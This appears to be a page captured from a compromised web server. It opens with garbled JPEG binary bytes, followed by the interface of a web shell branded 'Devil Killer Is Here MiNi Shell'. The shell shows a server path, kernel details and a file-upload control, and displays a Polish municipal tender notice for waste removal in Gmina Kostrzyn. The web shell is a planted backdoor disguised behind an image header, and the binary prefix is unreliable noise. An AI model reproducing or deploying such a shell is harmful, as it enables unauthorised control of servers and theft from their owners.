JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211230/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211230/0033856601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Bieżąca obsługa Gminy Kostrzyn w zakresie: wywozu odpadów <br/>z utrzymania i sprzątania otwartych terenów gminnych (zadanie 1) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kostrzyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631259554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kostrzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-025</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 61 8178 565</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 61 8178 191</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@kostrzyn.wlk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kostrzyn.wlkp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bieżąca obsługa Gminy Kostrzyn w zakresie: wywozu odpadów <br/>z utrzymania i sprzątania otwartych terenów gminnych (zadanie 1) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0708a01a-6962-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00338566</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania?ContractingEntityCity=kostrzyn <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób<br/>komunikowania się Zamawiającego z Wykonawcami w postępowaniu (nie dotyczy składania ofert!):<br/>1) komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który<br/>dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal, za pośrednictwem dedykowanego formularza: „Formularz do<br/>komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. Zamawiający może<br/>również komunikować się z Wykonawcami za pomocą poczty elektronicznej na adres email:<br/>zamowienia@kostrzyn.wlkp.pl, przetargi@kostrzyn.wlkp.pl.<br/>2) Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń (inne<br/>niż dołączane do oferty) składane są przez Wykonawcę za pośrednictwem „Formularza do<br/>komunikacji” jako załączniki. Zamawiający dopuszcza możliwość składania dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń (innych niż<br/>dołączane do oferty) za pomocą poczty elektronicznej, na adres email: zamowienia@kostrzyn.wlkp.pl,<br/>przetargi@kostrzyn.wlkp.pl.<br/>3) Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do komunikacji”.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu,<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal dostępnym pod adresem<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Warunkach korzystania z elektronicznej<br/>platformy usług administracji publicznej (ePUAP).<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje<br/>się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do komunikacji” wynosi 150 MB. Przy<br/>komunikacji drogą mailową wielkość pliku wynosi maksymalnie 500 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem XXVIII SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem XXVIII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZI.271.1.25.2021.IZ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wywóz odpadów z kontenerów, w których gromadzone będą<br/>odpady ze sprzątania otwartych terenów gminnych, utrzymania gminnych terenów zielonych,<br/>odpadów powstałych na festynach i innych wydarzeniach kulturalnych,<br/>a także odpadów z likwidacji dzikich wysypisk. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513200-8 - Usługi wywozu stałych odpadów miejskich</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający informuje, że przy świadczeniu usługi będącej przedmiotem zamówienia<br/>przewiduje zastosowanie prawo opcji, o którym mowa w art. 441 ust 1 ustawy Pzp.<br/>Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać<br/>w ramach realizacji niniejszej Umowy. W przypadku nieskorzystania przez Zamawiającego<br/>z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>2) Decyzję co do możliwości skorzystania z prawa opcji Zamawiający uzależnia od swoich<br/>bieżących potrzeb oraz wykorzystania wartości umowy. Zamawiający przewiduje możliwość<br/>zastosowania prawa opcji w przypadku niewyczerpania wartości umowy.<br/>a) Prawo opcji dla zadania 1:<br/>Ilości odpadów gromadzonych w kontenerach Zamawiającego wskazane w rozdz. IV SWZ -<br/>Opisie Przedmiotu zamówienia ust. 1 pkt 1 lit a) mogą ulec zwiększeniu o 20% lub zmniejszeniu<br/>o 10%. Zmiana ilości odpadów gromadzonych w kontenerach Zamawiającego uzależnione jest<br/>od zapotrzebowania Zamawiającego. Zwiększenie ilości ilości odpadów gromadzonych<br/>uzależnione jest od zapotrzebowania Zamawiającego opisanego w lit. h). W kontenerach<br/>gromadzone będą odpady ze sprzątania otwartych terenów gminnych, utrzymania gminnych<br/>terenów zielonych, odpadów powstałych na festynach i innych wydarzeniach kulturalnych, a<br/>także odpadów z likwidacji dzikich wysypisk. Zamawiający zaznacza, że tym samym ulegnie<br/>zmianie ilość odbieranych odpadów z kontenerów Zamawiającego. W trakcie realizacji<br/>zamówienia wskazane w Opisie Przedmiotu zamówienia ust. 1 pkt 1 lit g) ilości opróżnień mogą<br/>ulec zwiększeniu o 20% lub zmniejszeniu o 10%. Zmiana ilości opróżnień uzależnione jest od<br/>zapotrzebowania Zamawiającego. Zwiększenie ilości opróżnień uzależnione jest od<br/>zapotrzebowania Zamawiającego opisanego w lit. h).<br/>Zamawiający informuje, że prawo opcji zostało uwzględnione przy szacowaniu wartości<br/>zamówienia.<br/>3) Zmiana w zakresie wskazanym w pkt 2 i tym samym zmiana wynagrodzenia Wykonawcy<br/>może nastąpić wyłącznie z zastosowaniem prawa opcji - z odpowiednim zwiększeniem<br/>/zmniejszeniem maksymalnej kwoty umowy, przeznaczonej na realizację zamówienia.<br/>4) Warunkiem skorzystania przez Zamawiającego z prawa opcji będzie posiadanie w budżecie<br/>środków finansowych na realizację usług.<br/>5) Warunkiem uruchomienia - realizacji prawa opcji jest złożenie przez Zamawiającego<br/>pisemnego oświadczenia woli skierowanego przez Zamawiającego do Wykonawcy<br/>w przedmiocie skorzystania z prawa opcji w określonym przez niego zakresie, określenie ilości<br/>oraz numer umowy, na podstawie której realizowane jest prawo opcji. Niezłożenie oświadczenia<br/>we wskazanym w zdaniu poprzednim terminie będzie oznaczało, że Zamawiający rezygnuje z<br/>zastosowania prawa opcji. W przypadku zastosowania przez Zamawiającego prawa opcji<br/>oświadczenie, o którym mowa powyżej będzie stanowiło integralną część umowy.<br/>6) Zasady dotyczące realizacji przedmiotu umowy objętego prawem opcji będą takie same jak<br/>te, które obowiązują przy realizacji podstawowego przedmiotu umowy. Ceny jednostkowe<br/>określone w ofercie złożonej przez Wykonawcę w ramach przedmiotowego postępowania będą<br/>obowiązywać także w przypadku usług realizowanych w ramach prawa opcji. Wszystkie opcji. W przypadku zastosowania prawa opcji żadna cena wskazana w ofercie Wykonawcy, nie<br/>ulegnie zmianie za wyjątkiem przypadków i na zasadach opisanych w umowie.<br/>7) Zamawiający ma prawo skorzystania z prawa opcji wielokrotnie w terminie przewidzianym dla<br/>wykonania zamówienia podstawowego, w dowolnym dniu przed upływem terminu realizacji<br/>zamówienia. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenia zamówień z wolnej ręki, o których mowa w art. 214<br/>ust. 1 pkt 7 ustawy Pzp o łącznej wartości do 50% wartości zamówienia podstawowego. Zamówienia te<br/>polegać będą na powtórzeniu tego samego rodzaju usług, które objęte były zamówieniem<br/>podstawowym, przy zastosowaniu stawek, cen jednostkowych – zgodnie ze złożoną ofertą w<br/>postępowaniu na zadanie podstawowe, a w przypadku ich braku na podstawie indywidualnych<br/>negocjacji.<br/>Zamawiający uwzględnił całkowitą wartość tego zamówienia przy obliczaniu wartości niniejszego<br/>zamówienia publicznego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z rozdziałem XXI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas opróżnień kontenerów na zlecenie Zamawiającego (K)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniający warunki, o których mowa<br/>w art. 112 ust. 2 ustawy Pzp, i którzy wykażą ich spełnianie na poziomie wymaganym przez<br/>Zamawiającego zgodnie z opisem zamieszczonym poniżej oraz niepodlegający wykluczeniu z<br/>powodu okoliczności o których mowa w rozdziale V SWZ.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym <br/>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. <br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów <br/>Wykonawca spełni warunek jeśli wykaże, że posiada:<br/>- wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych oraz <br/>- wpis do rejestru BDO (bazy danych o odpadach) zezwalający na transport odpadów (Wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach <br/>i gospodarujących odpadami, o którym mowa w art. 49 i następne ustawy z dnia 14 grudnia 2012 r. o odpadach (tj.: Dz. U. z 2021 r. poz. 779 z późn. zm.), i który to rejestr stanowi element Bazy Danych o Odpadach, w zakresie transportu odpadów).<br/><br/>3)	sytuacji ekonomicznej i finansowej <br/>Wykonawca spełni warunek jeżeli wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 200 000,00 zł. <br/><br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnianie warunku w zakresie sytuacji finansowej i ekonomicznej Wykonawcy wykazują łącznie.<br/><br/><br/>4)	zdolności technicznej lub zawodowej – o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:<br/><br/>a)	posiadają wiedzę i doświadczenie do wykonania przedmiotu zamówienia tj. wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał z należytą starannością co najmniej:<br/>	jedno zamówienie polegające na wywozie odpadów (zadanie 1).<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca w Wykazie zrealizowanych usług (załącznik nr 8 do SWZ), wykaże, że w wymaganym okresie - przez min. <br/>8 miesięcy w ramach jednej umowy: zrealizował lub aktualnie realizuje, co najmniej jedno zamówienie dotyczące wywozu odpadów w ilości min. 150 Mg rocznie, <br/>w zakresie zgodnym lub szerszym od zakresu przedmiotowego zamówienia oraz załączy do niego dowody potwierdzające, że usługi te zostały wykonane lub są wykonywane w sposób należyty.<br/><br/>UWAGA:<br/>Zgodnie z art. 117 ust. 1 ustawy Pzp, zamawiający zastrzega, że W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, niniejszy warunek nie podlega zsumowaniu, co oznacza, że jeden z wykonawców musi wykazać się całym wymaganym doświadczeniem (warunek nie będzie spełniony, jeśli wszyscy Wykonawcy w sumie wykazali się wymaganym doświadczeniem, ale żaden z nich samodzielnie nie wykazał się całym wymaganym doświadczeniem). <br/><br/>b)	W zakresie dysponowania odpowiednim potencjałem technicznym - Zamawiający wymaga, aby Wykonawca dysponował odpowiednim potencjałem technicznym niezbędnym do realizacji przedmiotu zamówienia tj.:<br/>Wykonawca spełni ten warunek jeżeli wykaże, że posiada wyposażenie umożliwiające odebranie odpadów, tj. odpowiednią ilością pojazdów do zbierania odpadów i spełniających wymagania przepisów ochrony środowiska i o ruchu drogowym: <br/>	co najmniej 1 pojazd przystosowany do wywozu odpadów z kontenerów oraz co najmniej 1 pojazd przystosowany do opróżniania pojemników 1100 l (dla zadania 1);<br/><br/>Zamawiający uzna, za spełniony powyższy warunek, jeżeli Wykonawca w Wykazie sprzętu niezbędnego do realizacji zadania wykaże pojazdy niezbędne do realizacji zamówienia (załącznik nr 7 do SWZ), dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz informacją o podstawie do dysponowania tymi zasobami.<br/><br/>	Pojazdy powinny być trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu Wykonawcy.<br/>	Pojazdy powinny być wyposażone w narzędzia lub urządzenia umożliwiające uprzątnięcie terenu w przypadku jego zanieczyszczenia podczas opróżnienia pojemników.<br/>	Pojazdy realizujące przedmiot zamówienia muszą być sprawne i muszą posiadać ważne przeglądy techniczne oraz polisy OC i NW;<br/>	Wykonawca odpowiada za zabezpieczenie pojazdów i urządzeń przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu. W przypadku zanieczyszczenia terenu w wyniku działalności związanej z realizacją przedmiotu zamówienia Wykonawca jest obowiązany do jego natychmiastowego uprzątnięcia.<br/><br/>c)	dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonaniu zamówienia<br/>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku.<br/><br/>3.	Odnośnie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takim wypadku wykonawcy dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy – załącznik nr 5 do SWZ.<br/>4.	W przypadku posługiwania się przez wykonawcę cudzym potencjałem, w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>5.	Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed udzieleniem zamówienia wezwie wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych<br/>na dzień złożenia następujących podmiotowych środków dowodowych oraz oświadczeń,<br/>potwierdzających okoliczności, o których mowa w art. 125 ust.1 ustawy Pzp:<br/>w zakresie braku podstaw wykluczenia:<br/>a) oświadczenie Wykonawcy 